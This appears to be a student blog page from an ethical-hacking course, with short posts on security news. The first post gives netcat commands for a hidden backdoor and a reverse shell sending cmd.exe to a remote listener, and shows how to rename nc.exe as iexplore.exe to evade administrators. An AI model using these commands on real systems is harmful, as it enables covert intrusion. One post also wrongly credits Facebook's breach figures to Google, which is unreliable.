ITACS 5211: Introduction to Ethical Hacking

Wade Mackey

Week 07: NetCat and HellCat

How can a hacker hide from a system admin and still run a backdoor

by Leave a Comment

I had this piece of information which I came across when professor was taking NetCat class. I don’t have the whole article. Here is a piece that explains how a hacker can run the backdoor and also hide it from a not so smart network or system admin. It is technical. If you are interested in these type of information, read on.

Netcat Backdoor Victim: nc -L -d -p <port> -t -e cmd.exe

-L is the listening command. -d tells netcat not to open a window when running. -p assigns a port. -t is for telnet. -e activates cmd.exe when client connects to it
Client: nc -v <ip address of victim>
note: In this example netcat runs in the background on the victims machine. A system admin may open task manager and see that nc.exe is running. A smart hacker would change nc.exe to something like iexplorer.exe or updatemanager.exe in order to avoid suspiscion. Now, if a system administrator runs a trusted netstat –a –n command at the DOS prompt, he or she might notice that something is running on a rather odd port, telnet to that port, and discover the trick. However, Windows uses several random ports for varying reasons and netstat output can be time consuming to parse, especially on systems
with a lot of activity. Hackers might try a different approach. If they’ve infiltrated a Citrix server, for example, accessed by several users who are surfing the Web, you’d expect to see a lot of Domain Name System (DNS) lookups and Web connections. Running netstat –a –n would reveal a load of outgoing TCP port 80 connections. Instead of having an instance of Netcat listening on the Windows box and waiting for connections, Netcat can pipe the input and output of the cmd.exe program to another Netcat instance listening on a remote box on port 80. On his end, the hacker would run:

nc –l –p 80

From the Windows box, the hacker could cleverly “hide” Netcat again and issue these commands:

mkdir C:\Windows\System32\Drivers\q
move nc.exe C:\Windows\System32\Drivers\q\iexplore.exe
cd Windows\System32\Drivers\q
WINDOWS\System32\DRIVERS\q>iexplore.exe
Cmd line: -d -e cmd.exe originix 80
WINDOWS\System32\DRIVERS\q>
Now the listening Netcat should pick up the command shell from the Windows machine. This can do a better job of hiding a backdoor from a system administrator. At first glance, the connection will just look like Internet Explorer making a typical HTTP connection. Its only disadvantage for the hacker is that after terminating the shell, there’s no way of restarting it on the Windows side.

New iPhone Bug Gives Anyone Access to Your Private Photos

by 1 Comment

Be careful about what pictures you took!

A security enthusiast who discovered a passcode bypass vulnerability in Apple’s iOS 12 late last month has now dropped another passcode bypass bug that works on the latest iOS 12.0.1 that was released last week.
Jose Rodriguez, a Spanish amateur security researcher, discovered a bug in iOS 12 in late September that allows attackers with physical access to your iPhone to access your contacts and photos.
The bug was patched in iOS 12.0.1, but he now discovered a similar iPhone passcode bypass hack that works in 12.0.1 and is easier to execute than the bug Rodriguez discovered and reported two weeks ago.
The new hack allows anyone with physical access to your locked iPhone to access your photo album, select photos and send them to anyone using Apple Messages.

https://thehackernews.com/2018/10/iphone-lock-passcode-bypass.html

UK seeks to secure smart home gadgets

by Leave a Comment

This is a post related to the one I put up about FDA hiring ethical hackers to assess the vulnerabilities of medical devices. Smart home gadgets in many ways are similar to medical devices because they often feature embedded systems, which are fundamental in IOT devices. These are systems that need to be fast and efficient in their memory management. These devices tend to utilize lower level languages, such as C or even Assembly, which are highly prone to segfaults, memory leaks, and other issues that high level languages abstract away. These vulnerabilities can be attacked by hackers without too much difficulty because little things will cause entire programs to crash and burn. Therefore, I think it’s a good thing that the UK is creating some guidelines for securing home gadgets.

https://www.bbc.com/news/technology-45863948?intlink_from_url=https://www.bbc.com/news/topics/cz4pr2gd85qt/cyber-security&link_location=live-reporting-story

Chronicle: A Meteor Aimed At Planet Threat Intel?

by 1 Comment

https://krebsonsecurity.com/2018/01/chronicle-a-meteor-aimed-at-planet-threat-intel

In this article, it is mentioned, on what factors do the companies rely on security software and what factors do IT staff generally miss out, The article also talks about challenges faced by a new company which is entering into Cyber security or anti virus firm, how the new company example- CHRONICLE- (a malware intelligence service acquired by Google) should be able to differentiate itself from the existing available tools in the market.

https://medium.com/chronicle-blog/give-good-the-advantage-75ab2c242e45

Companies CEO Stephen Gillett mentions that they would include new features like machine learning, artificial intelligence also massive data analytics and storage capabilities which hopefully enable to help these organizations to reach the present standards.

The Cybersecurity 202: The FDA is embracing ethical hackers in its push to secure medical devices

by 1 Comment

Apparently attacks against medical devices are on the rise and the FDA is turning to ethical hackers. This is something I’ve thought about before. I don’t know much about medical devices, but I’ve always wondered what would happen if a hacker could somehow force a new pacemaker to segfault or something along those lines. This should be a very good measure to take in the FDA approval process because it will hold developers of these medical devices to a higher security standard. Although, I welcome input from anyone in the medical device field who has some experience in this area.

https://www.washingtonpost.com/news/powerpost/paloma/the-cybersecurity-202/2018/10/17/the-cybersecurity-202-the-fda-is-embracing-ethical-hackers-in-its-push-to-secure-medical-devices/5bc6156b1b326b7c8a8d1a01/?utm_term=.8f2d100fa6fb

CLEVER TOOL SHIELDS YOUR CAR FROM HACKS BY WATCHING ITS INTERNAL CLOCKS

by 2 Comments

In a paper they plan to present at the Usenix security conference next month, University of Michigan researchers Kyong-Tak Cho and Kang Shin describe an easy-to-assemble tool they call the Clock-based Intrusion Detection System, or CIDS. It’s designed to spot the malicious messages car hackers use to take control of vehicle components like brakes and transmission. The CIDS prototype uses a new technique to spot attack messages: It records the communications on a car’s internal network known as a CAN bus and—in just seconds—creates “fingerprints” for every digital component of a vehicle, the so-called Electronic Control Units or ECUs that allow everything from brakes to windshield wipers to communicate.

To perform that fingerprinting, they use a weird characteristic of all computers: tiny timing errors known as “clock skew.” Taking advantage of the fact that those errors are different in every computer—including every computer inside a car—the researchers were able to assign a fingerprint to each ECU based on its specific clock skew. The CIDS’ device then uses those fingerprints to differentiate between the ECUs, and to spot when one ECU impersonates another, like when a hacker corrupts the vehicle’s radio system to spoof messages that are meant to come from a brake pedal or steering system.

That sort of impersonation is key to how white hat hackers previously managed to remotely mess with vehicles’ brakes, transmission and steering systems.

 

https://www.wired.com/2016/07/clever-tool-shields-car-hacks-watching-internal-clocks/

Set your Clocks to 2038 (no, don’t…read this 1st)

by 1 Comment

I will admit to new ~reuse~ on this from another class…

…but this is a different audience.

This may look like dry sysadmin stuff, and a very small paragraph mentioning the _kernel_timespec…but this is roughly the Unix version of Y2K where 32-bit systems have been counting seconds since January 1970…and time is running out.

Realistically (and for those of us who may be retired in 2038), setting a timeout into the future on a machine that is vulnerable in this way would cause a buffer overflow. I heard they are bad. And cause interesting, sometimes exploitable side effects…

…since I first read this any time a system of update has innocently offered me a date range ~20 years or so into the future~ I have weighed breaking something I like or need Vs. Rodger Rabbit suggesting it might be funny. Not a hard experiment for a VM…

https://www.linux.com/news/2018/8/linux-kernel-418-keeps-things-solid-and-secure

https://en.wikipedia.org/wiki/Year_2038_problem

Why 802.11ax is the next big thing in Wi-Fi

by 2 Comments

IEEE 802.11ax or Wi-Fi 6 builds on the strengths of 802.11ac, while adding flexibility and scalability that lets new and existing networks power next- generation applications. IEEE 802.11ax OFDMA technology lets even first-wave 802.11ax access points support eight spatial streams and deliver up to 4800 Mbps at the physical layer, depending on vendor implementation. All clients will achieve higher effective throughput at the MAC layer, for a better overall user experience.

https://www.networkworld.com/article/3215907/mobile-wireless/why-80211ax-is-the-next-big-thing-in-wi-fi.html

Google to Encrypt Android Cloud Backups With Your Lock Screen Password

by 1 Comment

Google to Encrypt Android Cloud Backups With Your Lock Screen Password

– Swati Khandelwal

In an effort to secure users’ data while maintaining privacy, Google has announced a new security measure for Android Backup Service that now encrypts all your backup data stored on its cloud servers in a way that even the company can’t read it.

Starting with Android Pie, Google is going to encrypt your Android device backup data in the following way:

Step 1: Your Android device will generate a random secret key (not known to Google).

Step 2: The secret key will then get encrypted using your lock screen PIN/pattern/passcode (not known to Google).

Step 3: This passcode-protected secret key will then securely sent to a Titan security chip on Google’s servers.

Reference: https://thehackernews.com/2018/10/android-cloud-backup.html

Updates on the Recent Facebook Security Breach

by 2 Comments

30 Million Facebook Accounts Were Hacked: Check If You’re One of Them

Google initially estimated that the number of customers affected by the access token breach could have been 50 million, the company then downgraded the number to 30 million after the investigation.

  • For about 15 million Facebook users, attackers accessed two sets of information: usernames and contact information including phone numbers, email addresses and other contact information depending on what users had on their profiles.
  • For about 14 million Facebook users, attackers accessed an even wider part of their personal data, including the same two sets of information mentioned above, along with other details users had on their profiles, like gender, language, relationship status, religion, hometown, current city, birthdate, device types used to access Facebook, education, work, the last 10 places they checked into or were tagged in, website, people or pages they follow, and the 15 most recent searches.
  • A remaining 1 million Facebook users did not have any personal data accessed by the attackers.

 

https://thehackernews.com/2018/10/hack-facebook-account.html